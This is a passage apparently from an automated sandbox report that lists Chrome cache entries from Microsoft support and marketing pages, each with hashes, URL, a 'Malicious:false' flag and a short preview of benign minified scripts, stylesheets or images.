                                                                                                                      Preview:'use strict';(()=>{function c(b){var a=e[b];if(void 0!==a)return a.exports;a=e[b]={exports:{}};return f[b](a,a.exports,c),a.exports}var f={6993:()=>{$(function(){$(".area-heading p a").each(function(b,a){b=$(a).closest("div.row").find("h1,h2,h3,h4,h5,h6");a.dataset.biCn=a.innerText;a.dataset.biEcn=a.innerText;a.dataset.biCompnm="Area Heading";a.dataset.biBhvr="0";a.dataset.biCt="Link";a.dataset.biPa="Body";b=b.first();b.text()&&""!==b.text()&&(a.dataset.biHn=b.text().trim(),a.dataset.biEhn=b.text().trim())});.document.querySelectorAll(".areaheading sup").forEach(function(b){0==b.children.length&&b.insertAdjacentHTML("afterbegin",'\x3cspan class\x3d"sr-text"\x3eFootnote\x3c/span\x3e')})})}},e={};c.n=b=>{var a=b&&b.__esModule?()=>b.default:()=>b;return c.d(a,{a}),a};c.d=(b,a)=>{for(var d in a)c.o(a,d)&&!c.o(b,d)&&Object.defineProperty(b,d,{enumerable:!0,get:a[d]})};c.o=(b,a)=>Object.prototype.hasOwnProperty.call(b,a);c(6993)})();

                                                                                                                      Chrome Cache Entry: 306

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (10933)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):10978
                                                                                                                      Entropy (8bit):5.113898622156223
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:fhsrAxRhWsJlXOeZTxB2Q3os25mPZT8u4wtVVAkhSOWzaVBmdcYZ:lJlvZTjv3os25mPF4wtbAkhSOWmjQc8
                                                                                                                      MD5:81C98606FDCF5261F4626856A3A920A6
                                                                                                                      SHA1:535E11D6D16FFC17316EFB6B1EA553335DE5F2A0
                                                                                                                      SHA-256:6D774AED5BE6E9D53DB8DF5432FB7E6642E90BB1315F49E63FE6FF4340ECC156
                                                                                                                      SHA-512:EE28BED0C8E277EDDECF0055AA8D3BF1FCE966E5352F2401C7E587487029282CDF9EBEAA6B1611992F4A331029EF708876331244C4A395047756D7F526F4C653
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.microsoft.com/js/Article.Main.min.js?v=bXdK7Vvm6dU9uN9UMvt-ZkLpC7ExX0nmP-b_Q0DswVY
                                                                                                                      Preview:!function(){"use strict";var t="click",e="ocHidden",n="supCardControlCarouselDisabledButton",o=".supCardControlCarouselPrevButton",i=".supCardControlCarouselNextButton",r="".concat(o,", ").concat(i);function a(t,e){$(t).children(r).toggleClass(n,!e)}var s=".supCardControlContainer",l=".supCardControlCard",c=".heroCardControlCard";function u(){var t=this.querySelector("div.videoContainer");if(t){var e=t.querySelector("div.supCardControlImageContainer");e&&e.addEventListener("click",(function(){var e=t.querySelector("div.cardControlCarouselVideoArea");if(e){var n=e.querySelector("universal-media-player");n&&(e.removeAttribute("hidden"),n.play())}}))}}function d(t){$(t).on("setPosition",(function(t,e){var n,o=e.$dots;(null===(n=e.options)||void 0===n?void 0:n.slidesToShow)<e.slideCount?o.show():o.hide()}))}function h(t,e){t&&(t.style.backgroundImage=""===e?"none":"url(".concat(e,")"),t.classList.add("heroCarouselSection"))}function f(t,e,n){var o=t.find(n);if(o.length){var i="focus"===e.t

                                                                                                                      Chrome Cache Entry: 307

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (65398)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):149977
                                                                                                                      Entropy (8bit):5.425465014322962
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:ds2R7b4i2VvQ8jDNbSDU6ez/4/fOmToUJdupe:dvJ26Dkw/LT9JduY
                                                                                                                      MD5:107489D1ED6BE77BFD69EBE4D7B52B6D
                                                                                                                      SHA1:FD56DF206A1DD0223D6D18ADAC841582282A346E
                                                                                                                      SHA-256:3BBC0000E28054DDBE38B2E7A21DCA8D66FDA56EA48448BCE4658BC6B518A970
                                                                                                                      SHA-512:51C5F6D9D7D10D06777ADE20C7E63CBFA354B830B68D32FEDE4B93C15D80873C501C0CCC4D006FD58C639662D2DCBBA193B61427D30F8938EDA4B9049743BC65
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.microsoft.com/lib/oneds/dist/ms.analytics-web-4.0.2.min.js?v=O7wAAOKAVN2-OLLnoh3KjWb9pW6khEi85GWLxrUYqXA
                                                                                                                      Preview:/*!. * 1DS JS SDK Analytics Web, 4.0.2. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,n){var t="undefined";if("object"==typeof exports&&typeof module!=t)n(exports);else if("function"==typeof define&&define.amd)define(["exports"],n);else{var r,i,e=typeof globalThis!=t?globalThis:e||self,a={},o="__ms$mod__",c={},u=c.es5_ms_analytics_web_4_0_2={},s="4.0.2",l="oneDS4",f=(f=e)[l]=f[l]||{},d=(d=e)[l="oneDS"]=d[l]||{},e=f[o]=f[o]||{},g=e.v=e.v||[],l=d[o]=d[o]||{},p=l.v=l.v||[];for(i in(l.o=l.o||[]).push(c),n(a),a)r="x",f[i]=a[i],g[i]=s,typeof d[i]==t?(r="n",(d[i]=a[i])&&(p[i]=s)):p[i]||(p[i]="---"),(u[r]=u[r]||[]).push(i)}}(this,function(t){"use strict";var o="object",ye="undefined",c="prototype",u=Object,s=u[c],$=undefined,y=null,l="",f="boolean",d="function",g="number",v="object",m="prototype",T="__proto__",b="string",I="undefined",C="constructor",N="Symbol",S="_polyfill",w="indexOf",P="length",A="done",_="value",D="name",O="sl

                                                                                                                      Chrome Cache Entry: 309

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (65398)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):149977
                                                                                                                      Entropy (8bit):5.425465014322962
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:ds2R7b4i2VvQ8jDNbSDU6ez/4/fOmToUJdupe:dvJ26Dkw/LT9JduY
                                                                                                                      MD5:107489D1ED6BE77BFD69EBE4D7B52B6D
                                                                                                                      SHA1:FD56DF206A1DD0223D6D18ADAC841582282A346E
                                                                                                                      SHA-256:3BBC0000E28054DDBE38B2E7A21DCA8D66FDA56EA48448BCE4658BC6B518A970
                                                                                                                      SHA-512:51C5F6D9D7D10D06777ADE20C7E63CBFA354B830B68D32FEDE4B93C15D80873C501C0CCC4D006FD58C639662D2DCBBA193B61427D30F8938EDA4B9049743BC65
                                                                                                                      Malicious:false
                                                                                                                      Preview:/*!. * 1DS JS SDK Analytics Web, 4.0.2. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,n){var t="undefined";if("object"==typeof exports&&typeof module!=t)n(exports);else if("function"==typeof define&&define.amd)define(["exports"],n);else{var r,i,e=typeof globalThis!=t?globalThis:e||self,a={},o="__ms$mod__",c={},u=c.es5_ms_analytics_web_4_0_2={},s="4.0.2",l="oneDS4",f=(f=e)[l]=f[l]||{},d=(d=e)[l="oneDS"]=d[l]||{},e=f[o]=f[o]||{},g=e.v=e.v||[],l=d[o]=d[o]||{},p=l.v=l.v||[];for(i in(l.o=l.o||[]).push(c),n(a),a)r="x",f[i]=a[i],g[i]=s,typeof d[i]==t?(r="n",(d[i]=a[i])&&(p[i]=s)):p[i]||(p[i]="---"),(u[r]=u[r]||[]).push(i)}}(this,function(t){"use strict";var o="object",ye="undefined",c="prototype",u=Object,s=u[c],$=undefined,y=null,l="",f="boolean",d="function",g="number",v="object",m="prototype",T="__proto__",b="string",I="undefined",C="constructor",N="Symbol",S="_polyfill",w="indexOf",P="length",A="done",_="value",D="name",O="sl

                                                                                                                      Chrome Cache Entry: 311

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (3164)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):34401
                                                                                                                      Entropy (8bit):5.567515913811421
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:xluaIaJW9ePBW/YfKbNckc0OFc0hLoSIbSZdfKGnRmSdgSJnsYXZeTnOki:XuioyA/7c0opLozb6RmCg6kTG
                                                                                                                      MD5:5EE9E4E4E0A5FD39092E63D2D102B12B
                                                                                                                      SHA1:1B66C81BD03006B327228854327C0FD3DF434BC2
                                                                                                                      SHA-256:441B9F212CD322C6B039A2691F999EB2FAFC10FD645BCDB043A6DEE2DD052DA7
                                                                                                                      SHA-512:3CA07A5D89931BCF6F0294C0727020A7FFE663487DB6ECC309FF69DDF59A0490BF85395E91241D40ED1DCF157C0784E6D6B53D8C92D52ED05823CCB6FBE1C470
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/microsoft/clientlibs/clientlib-httpclient.min.ACSHASH5ee9e4e4e0a5fd39092e63d2d102b12b.js
                                                                                                                      Preview:'use strict';(()=>{function L(n){var r=T[n];if(void 0!==r)return r.exports;r=T[n]={exports:{}};return U[n](r,r.exports,L),r.exports}var U={3770:(n,r,h)=>{n.exports=h(2494).default},2494:(n,r,h)=>{function f(x){return!x.response&&!!x.code&&"ECONNABORTED"!==x.code&&(0,a.default)(x)}function g(x){return"ECONNABORTED"!==x.code&&(!x.response||500<=x.response.status&&599>=x.response.status)}function p(x){return!!x.config&&g(x)&&-1!==t.indexOf(x.config.method)}function m(x){return f(x)||p(x)}function k(){return 0}.function l(x){var H=x[A]||{};return H.retryCount=H.retryCount||0,x[A]=H,H}function u(x,H){x.interceptors.request.use(function(E){return l(E).lastRequestTime=Date.now(),E});x.interceptors.response.use(null,function(E){var v=E.config;if(!v)return Promise.reject(E);var I=Object.assign({},H,v[A]),P=I.retries;P=void 0===P?3:P;var J=I.retryCondition;J=void 0===J?m:J;var M=I.retryDelay;M=void 0===M?k:M;I=I.shouldResetTimeout;I=void 0!==I&&I;var Q=l(v);if(J(E)&&Q.retryCount<P){Q.retryCount+

                                                                                                                      Chrome Cache Entry: 312

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (45900)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):45963
                                                                                                                      Entropy (8bit):5.396725281317118
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:H/eCtKv79zpXXfoJLjtK8Dx1DieS3i8eqUvdX:W/vXQJJDD27W
                                                                                                                      MD5:F00CFBA8F9859DFEFDFE90EA520C6FCF
                                                                                                                      SHA1:B32E153588A287DE81050E327EB5BD7A90B04D99
                                                                                                                      SHA-256:977CC9882BA50763333DF64E98D26BC3C60A15D6EFA4A2C1FE70579985EDDF84
                                                                                                                      SHA-512:DA51FAB6D6A6B05A1730FB97656A496870FE1248616BC3F9DDBE101D1C189B6BEC7CAF63976418F88843AFA64763D25542787116FFE0E43E35BF3DCE61914DAB
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.microsoft.com/js/SilentSignInManager.Main.min.js?v=l3zJiCulB2MzPfZOmNJrw8YKFdbvpKLB_nBXmYXt34Q
                                                                                                                      Preview:!function(){var t={8488:function(t,e,n){var r=n(2746);t.exports=r},3104:function(t,e,n){var r=n(7273);t.exports=r},6564:function(t,e,n){var r=n(2445),o=n(3478),i=n(7269),a=r.TypeError;t.exports=function(t){if(o(t))return t;throw a(i(t)+" is not a function")}},5719:function(t,e,n){var r=n(2445),o=n(3478),i=r.String,a=r.TypeError;t.exports=function(t){if("object"==typeof t||o(t))return t;throw a("Can't set "+i(t)+" as a prototype")}},1313:function(t,e,n){var r=n(4486),o=n(6635),i=n(9783),a=r("unscopables"),u=Array.prototype;null==u[a]&&i.f(u,a,{configurable:!0,value:o(null)}),t.exports=function(t){u[a][t]=!0}},3855:function(t,e,n){var r=n(2445),o=n(7455),i=r.TypeError;t.exports=function(t,e){if(o(e,t))return t;throw i("Incorrect invocation")}},4482:function(t,e,n){var r=n(2445),o=n(3406),i=r.String,a=r.TypeError;t.exports=function(t){if(o(t))return t;throw a(i(t)+" is not an object")}},3410:function(t,e,n){"use strict";var r=n(2445),o=n(6981),i=n(5633),a=n(2048),u=n(7065),s=n(1977),c=n(9

                                                                                                                      Chrome Cache Entry: 313

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 594 x 332, 8-bit/color RGBA, non-interlaced
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):17028
                                                                                                                      Entropy (8bit):7.926562320564401
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:7wixC+iG9rj5+kgbLPcAmxOkpJIhI9CvaMo05vCf9MRRLMk5K/jk:sifiG2tvXmxHbIhlo05KlGRaY
                                                                                                                      MD5:DDCB4FCA39CCADCDF6C1FE2E1F717867
                                                                                                                      SHA1:88238D53920F32AF37A802A5E6BFEEC3B1E6F75D
                                                                                                                      SHA-256:097DF2DFA3781F1AEDB631C968D04D8152D7C7FA8E92BC91E233B3000E2F34BB
                                                                                                                      SHA-512:316574E565EF67B97E13D0BF01CF4AFA8E0E9CF0748768CE4AE6BBB81352685A6E027EADBC083D2B632C412C950E65963E6EA98FE4CE7692C0AE0B6D956D3D37
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.content.office.net/en-us/media/a9241eee-a729-4513-97b4-5b87c381c21b.png
                                                                                                                      Preview:.PNG........IHDR...R...L.......R.....pHYs...%...%.IR$.....sRGB.........gAMA......a...B.IDATx..Y.mWU.W.7.A.e.Z..H.R.F.......$!....iH..4...T@..{i.A.....M..... .XP6eaB..R% ...Bs.o.0N..w...Zkvk..j.>g.}.^...c.1O...?..K.I'..J..<.c..fX!..N.m5...!.O-.=....p/....B.m_..o..........7.{..............]..~...C.....J..g..*bI.C.....@&.7.}...u.RYs.J_.P_..j.....J...%..}.{..)}o,....|...2iil+1.n:.W.b.I@. ......q/........},...K.....b.35f.....@t.C.H..f.....X8...qXA5W\m*G..78..E.Wjm..j.C.E.....L.!e...}..... .FKi......!........t.;.s:8.P....9...H@....I! ...lp....`...".#.... .d"......=eN.nNcMUu......=.l......a.@...KY...^.....D..........=..<%&..}...P.HK.CE...0...R1..r..#h.5...)....z.B.....7.DH....KE...ha)....Z.=........)b*ZH.X.._...)........HK.a.Pn.X1Eh.....o.B......k...2....`..v.O.=...]..Y.!..:R.:......G*@jg.q.[b.....)].O.....jm...q.c..*...=B...|.........%....x.Bc..[.....r.....4......R.}......R...6.I..W..!...8K...:..U.. .3ZH...t.e..f\.(...y>k+.AH"..K.GjI!....J.}...HK..&..%.

                                                                                                                      Chrome Cache Entry: 314

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (309), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):309
                                                                                                                      Entropy (8bit):4.971196656935236
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6:QuVtCiR2cIT53AM+64uT7nadCkq9KwhA6ONHSInadLb1wnzjCY1ee:jVtCyB4w1cWdYpAfVSVdLa8e
                                                                                                                      MD5:D7106DB242C2B41F88A1B02418BEC7E2
                                                                                                                      SHA1:7A445118F0B5712744AA4AED6889B28C1E7779F7
                                                                                                                      SHA-256:044527A735B287BD84D2AE6D2D3B89C85B52C9750BB07E5AEF19FB8F28F0442B
                                                                                                                      SHA-512:C493FBD6926006108E56E23BB204BFE59A7364ED6D2409B5B258D9EA6C060259E13A7E7A22021607F6EDD55EEA52C75DFE7FCF18BB76D6E539FBD763BF399185
                                                                                                                      Malicious:false
                                                                                                                      Preview:'use strict';var DynamicClientSideScriptHandler=function(){return{fetchScriptLink:function(b){var a=(a=document.querySelector('div[data-identifier\x3d"'+b+'"]'))?a.getAttribute("data-content"):null;null===a&&(a=(b=document.querySelector('meta[name\x3d"'+b+'"]'))?b.getAttribute("content"):null);return a}}}();

                                                                                                                      Chrome Cache Entry: 315

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):159
                                                                                                                      Entropy (8bit):4.661188988961239
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:agWqLss4aXD5R20gJYRnd7HtOx1L5HQhLIzseX5LxfYLk21:QqPXD5bDRd7H8L5whLzeJSI21
                                                                                                                      MD5:C22EA5B46F3FCAD90DA0ABCC0A3F73D4
                                                                                                                      SHA1:2DB789C63AFB63D98932D7B55907DC3508E318B4
                                                                                                                      SHA-256:8334DAA260516BB896407461E5F10E8E3041B06C56846BBB9D3435C6E77513AD
                                                                                                                      SHA-512:A0359F8C25DC40CEFFD14A41BA81794717B99DABE78CBF8A8678F3E3EC57F317388CA0DC55B1CC6AD2D6C13D2B3CAEB5A64527BB2C646ED2D93775437DA646F1
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/microsoft/components/structure/page/clientlibs/featurecontrol.min.ACSHASHc22ea5b46f3fcad90da0abcc0a3f73d4.js
                                                                                                                      Preview:'use strict';function isFeatureEnabled(b){var a=document.getElementById("customFeatureControl").getAttribute("enabledFeatures");return null!=a&&a.includes(b)};

                                                                                                                      Chrome Cache Entry: 316

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (512)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):544
                                                                                                                      Entropy (8bit):5.221040627274746
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:Yz+uu8HDeNucEuKEZEuwdaXOVWMsk2lntX2F3/v2d7oyxCJNe:YauZStKa5nltX2Fvege
                                                                                                                      MD5:383B23D12DF0D9265D7569A7102C2F96
                                                                                                                      SHA1:B78FB17F58484F5CD29B3FE307936181E1B30B57
                                                                                                                      SHA-256:BBF608E321107D6C4EEAF31A4A0EEB9DD8A9AB825F645FA963651688FD3D3914
                                                                                                                      SHA-512:8CA27D482871CAFF41C2D86CA743F075ED97465C12624B1841396B423229A90AFB7E62211BB02DFC0211C45BBABFD12F82EFF8863E6FD3D176FCD99C84747F60
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/cascade.component.authoring/clientlibs/clientlib-greenid.min.ACSHASH383b23d12df0d9265d7569a7102c2f96.js
                                                                                                                      Preview:'use strict';(function(){(function(b){var a=document.createElement("iframe");a.setAttribute("src","https://fpt.microsoft.com/tags?session_id\x3d"+b);a.style.width="100px";a.style.height="100px";a.style.cssText="display: none; color: rgb(0,0,0); float:left; position:absolute; top:-200px; left:-200px; border:0px";a.title="greenID";a.setAttribute("id","greenID");document.body.append(a)})(function(){return"10000000-1000-4000-8000-100000000000".replace(/[018]/g,b=>(b^crypto.getRandomValues(new Uint8Array(1))[0]&.15>>b/4).toString(16))}())})();

                                                                                                                      Chrome Cache Entry: 317

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 100x100, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):2832
                                                                                                                      Entropy (8bit):7.92569260000134
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:5vgIfLwwvMw0oRW3lJOef6SE771axbtO4SSlPuVmcW3lIMJUCfVA2WNwfUFzzrPL:mIfL7v0oRWHOUEn1aH/Ll5h3KMJUcjWN
                                                                                                                      MD5:9F25C34D443324665BB679F0C9716FF0
                                                                                                                      SHA1:6224748E3C5968F23CF4717A3FFDB797A609DBAA
                                                                                                                      SHA-256:65CBC7C735A938DCD2F8C5F74090229DF93E974613E757B0920F63DAEF5E2989
                                                                                                                      SHA-512:BCAC42EBEE72C4443E7BCAAF10F94A02F17F0B2E7560EF766A41B808FD9E5BDA55871C92001C6A04B39CF0EF46958A0DE6DC981D8A8B5E3170E32230A7233FF4
                                                                                                                      Malicious:false
                                                                                                                      URL:https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Icon_NewsSocial_68x68?scl=1
                                                                                                                      Preview:RIFF....WEBPVP8 .....'...*d.d....%..W..9.%.+.O....O....W.S.....#.........px.~......W.....9.@.....g.....'.N.../.......f....@......B...g..........{;.o.........~..........g........`~.{.~.|.....Rl.;w..T. ..nk6..P........=./.JZo...%..n..>q.,.6..z..oq...u62......A.J<.mC.zvJ,..#..?....M.......:.S..d.1..W...[...S..G......b...%...@.E..C.9..........f....}n..L......0I./B].1..q... ....-..U.....b.hZ..zL.M.m..m.\.3y..n.1(..V.C#..I....'..{3....QZ..........2O....y...|.....^.e.l...0.*......c...=.?~2.n8.e}#+..|....4...h..d..m..".....v<..j.@M.Y.?'.=s...w.0T.mv.....Y...?....{.y......~.v.g......./.'.p.nA.k2..]..e..*?cF..]...n..@._....SI.....l......X.L..N6.q....M.Q..U.s..6S..q..!.P.g.7.Nu.3.Av....luT.............]6..;c!.D."W..C9....B.p.......n>..y...s..@F.g..]rN]o..'..I...0.U...Ibv.J..........<0.N......g#.A].....>.>^......{.!2I...V.He.*...A.....U_qf..59.T...1.?..4f...`l.dl.....G.|^........:..c...".. ....?......u.?.-...8zw..^Yc....y.7r[.&.;].{....,.H....M.._

                                                                                                                      Chrome Cache Entry: 318

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (590)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1716
                                                                                                                      Entropy (8bit):5.2304068952006615
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:4435HDQ258U3JqVnCG/6YyTrkzRLj9tSRAE9P:hU25ZqVC6ByTrWRLjSRAE9P
                                                                                                                      MD5:4CFFC2C9B55F8BDE649E0D2535A1EEBD
                                                                                                                      SHA1:2AAF4DF1E02ED4F5BB48F00A7423F748BF544E0C
                                                                                                                      SHA-256:7BB50A050792F761855CC330E0248D037B37DD68FD23FBB7DB8A7E8694F50A94
                                                                                                                      SHA-512:599C87219B7E264CFF8E6951192C691E26DFFA88EFC607EDFE9205F1BB08DA28FD61B508FAE93652BE36BE1ADA57E50661490925B247A43C3EB7F24D8CA0C8D0
                                                                                                                      Malicious:false
                                                                                                                      Preview:'use strict';var experimentationAnalytics=function(){function g(a){return a&&0<a.length?!1:!0}function m(a){return Object.keys(a).map(function(b){return b+""+a[b]}).join("")}function n(a){var b=a.reduce(function(c,e){c[m(e)]=e;return c},{});return Object.keys(b).map(function(c){return b[c]})}function h(a){console.log("sendToVortex Call");a&&a.analytics&&f(a)}function k(a){return{actionType:"A",behavior:"12",content:JSON.stringify({}),pageTags:{tnta:a&&a.analytics?a.analytics.tnta:""}}}function l(a,.b){return{actionType:"A",behavior:"12",content:JSON.stringify({}),pageTags:{tnta:"",at_activity_name:a&&a.responseTokens[b]?a.responseTokens[b]["activity.name"]:"",at_exp_name:a&&a.responseTokens[b]?a.responseTokens[b]["experience.name"]:"",at_activity_id:a&&a.responseTokens[b]?a.responseTokens[b]["activity.id"]:"",at_exp_id:a&&a.responseTokens[b]?a.responseTokens[b]["experience.id"]:""}}}function f(a,b,c){b="number"===typeof b?b:25;c="number"===typeof c?c:200;var e=0;if(window.expAnalytics&

                                                                                                                      Chrome Cache Entry: 319

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):275
                                                                                                                      Entropy (8bit):4.714732721492951
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6:DpAD0PVVdEkVaMJKrxKTyRNBVaMJKrhfQflfCGKTyRNhJ:yAthTJKcTaTJKlfQfFSTU
                                                                                                                      MD5:6F506B608145FDF960C714FFC7198C16
                                                                                                                      SHA1:BF71B0D1729D7D12ECD8DEB24C83B7B5ABC4F5EB
                                                                                                                      SHA-256:2992C4F04057594405C063FE0A461E0101AFEB85330BFCF564FCE3D773D4A572
                                                                                                                      SHA-512:1DB30D98BFA8BC70C94C44C0D10080536BA4BADA854207E236263D24329E95F857B93874A638850107EC0E4DC9C1F58DED791E2D94EE63F6FC969ED4D7D7295E
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/microsoft/components/content/lists/link-list/v1/link-list/clientlibs/site.min.ACSHASH6f506b608145fdf960c714ffc7198c16.css
                                                                                                                      Preview:.popover-header-link-list{font-weight:600}..popover-cursor{cursor:pointer}.@media screen and (forced-colors:active){.link-list .img-fluid{filter:invert(1)}.}.@media screen and (forced-colors:active) and (prefers-color-scheme:light){.link-list .img-fluid{filter:invert(0.1)}.}

                                                                                                                      Chrome Cache Entry: 320

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (2230), with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):2230
                                                                                                                      Entropy (8bit):5.1220413514345156
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:UhdH51FtNZlLC1hdGKhhHH1FtNHt1h9hKhZS7zJRLkVbS01S0hSjSTMJcUSjSLpY:Q//JLCFGeV/ttD7rAc0MP+QuD+LpY
                                                                                                                      MD5:4D56AF8ACF934242A6D0C2D5FD5785E1
                                                                                                                      SHA1:9D58373C57C53221C4762B87BDC186F6E38384D0
                                                                                                                      SHA-256:6F26F0CC605A8C789C557B2956CE78D147D5D2CC16D2F09B3A606306BCA3F4DE
                                                                                                                      SHA-512:1ECA9E9FEF9757337739BC530C87AAA8B9209A14C16F570FC8041618274330E3649F6D0A7E9FA97DC45DC8BB8FDE61A18E06F98E8A48E7BC5F22D4D53CC217A3
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.microsoft.com/css/SearchBox/search-box.css?v=bybwzGBajHicVXspVs540UfV0swW0vCbOmBjBryj9N4
                                                                                                                      Preview:.searchBox .searchBoxForm{position:relative;margin:0}.searchBox .searchBoxForm .searchBoxInput{width:100%;height:3.1875rem;font-family:"Segoe UI","Segoe UI Web","wf_segoe-ui_normal","Helvetica Neue","BBAlpha Sans","S60 Sans",Arial,sans-serif;font-size:1rem;padding-left:1.125rem;padding-right:3.625rem;border:.0625rem solid #a3a3a3;border-radius:.125rem;box-sizing:border-box;outline:0}html[dir=rtl] .searchBox .searchBoxForm .searchBoxInput{padding-left:3.625rem;padding-right:1.125rem}.searchBox .searchBoxForm .searchBoxButton{position:absolute;font-family:"Segoe UI","Segoe UI Web","wf_segoe-ui_normal","Helvetica Neue","BBAlpha Sans","S60 Sans",Arial,sans-serif;cursor:pointer;padding:0 .25rem;top:0;right:0;width:3.125rem;height:3.1875rem;background-color:transparent;border:none}html[dir=rtl] .searchBox .searchBoxForm .searchBoxButton{left:0;right:auto;transform:scaleX(-1)}.searchBox .searchBoxForm .searchBoxButton .searchBoxIconContainer{display:flex;color:#0078d4;justify-content:center}.

                                                                                                                      Chrome Cache Entry: 321

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):175
                                                                                                                      Entropy (8bit):4.68043398329258
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:agWqLs3KOBmKL8ELDSzEfYZBAeOE8c/yCN9xGV9LH1CNILWAcELDlpKOBmKL8ELQ:QqtgLSH9xGf1OILWAfkgXe
                                                                                                                      MD5:96F0C5B1219E39B8788028F5C17A5AD9
                                                                                                                      SHA1:D6DCE0DE065B0D13905EAEDA0BA5C0DEA3D8F67C
                                                                                                                      SHA-256:1FC2BCE2D46DF4565B8C488B22225CFE7ADB7C37CC9A542D4F85B61995B306CB
                                                                                                                      SHA-512:057810FA0558506C6B8ABECB1A7A58FF61DA0609B3A5798BB42DE3A9B801CA0D8B20C4C1F9A250EE33D30492452CC5C4553332B16300408AA0C45B1515D4AF10
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/cascade.component.authoring/clientlibs/clientlib-cookieconsent.min.ACSHASH96f0c5b1219e39b8788028f5c17a5ad9.js
                                                                                                                      Preview:'use strict';function AEMOnCookieConsentChangedCallback(a){}if("undefined"!=typeof WcpConsent&&null!=WcpConsent)WcpConsent.onConsentChanged(AEMOnCookieConsentChangedCallback);

                                                                                                                      Chrome Cache Entry: 322

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (7862)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):129677
                                                                                                                      Entropy (8bit):5.330029900554168
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:BkDsmoyraxaOfNPN5/4OYQk9qNeUyMLBRMr:BkZX2xaw8
                                                                                                                      MD5:10908F1C465EEADC74B1C17C9515EB8A
                                                                                                                      SHA1:EAB69087F1E08128C3B08CE3AFB6E5980CBF058D
                                                                                                                      SHA-256:51F1F59783B1C7C3C9F4C892F629C6A9F801ECCFC2CEA0B1D6AB5A1DC685DD03
                                                                                                                      SHA-512:55CF4EFB3D2314CF1ECE48E9A146A40B6A884C66027FD19BDDC2BBCBCCBAAA0C07DF6AE7937DC1DD8783257B515ABF0B2CF84F2E0CDA4236FA92ED01A54FDDD1
